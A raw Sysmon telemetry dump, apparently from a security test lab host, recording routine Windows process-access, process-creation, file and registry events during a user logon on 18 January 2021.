dll.dll+51791 10341000x800000000000000010310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.680{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.680{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+
244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000010306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.649{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.649{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x800000000000000010298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:58:18.633{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask2021-01-18 13:58:18.633 10341000x800000000000000010297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.618{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.618{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.524{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.524{59A5CD1D-93FA-6005-F904-00000000A301}28604336C:\Windows\system32\userinit.exe{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+23e5|C:\Windows\system32\userinit.exe+346e|C:\Windows\system32\userinit.exe+3725|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x800000000000000010287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.370{59A5CD1D-93FA-6005-FB04-00000000A301}3820C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 13241300x800000000000000010286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.477{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005dc) 13241300x800000000000000010285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x800000000000000010284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
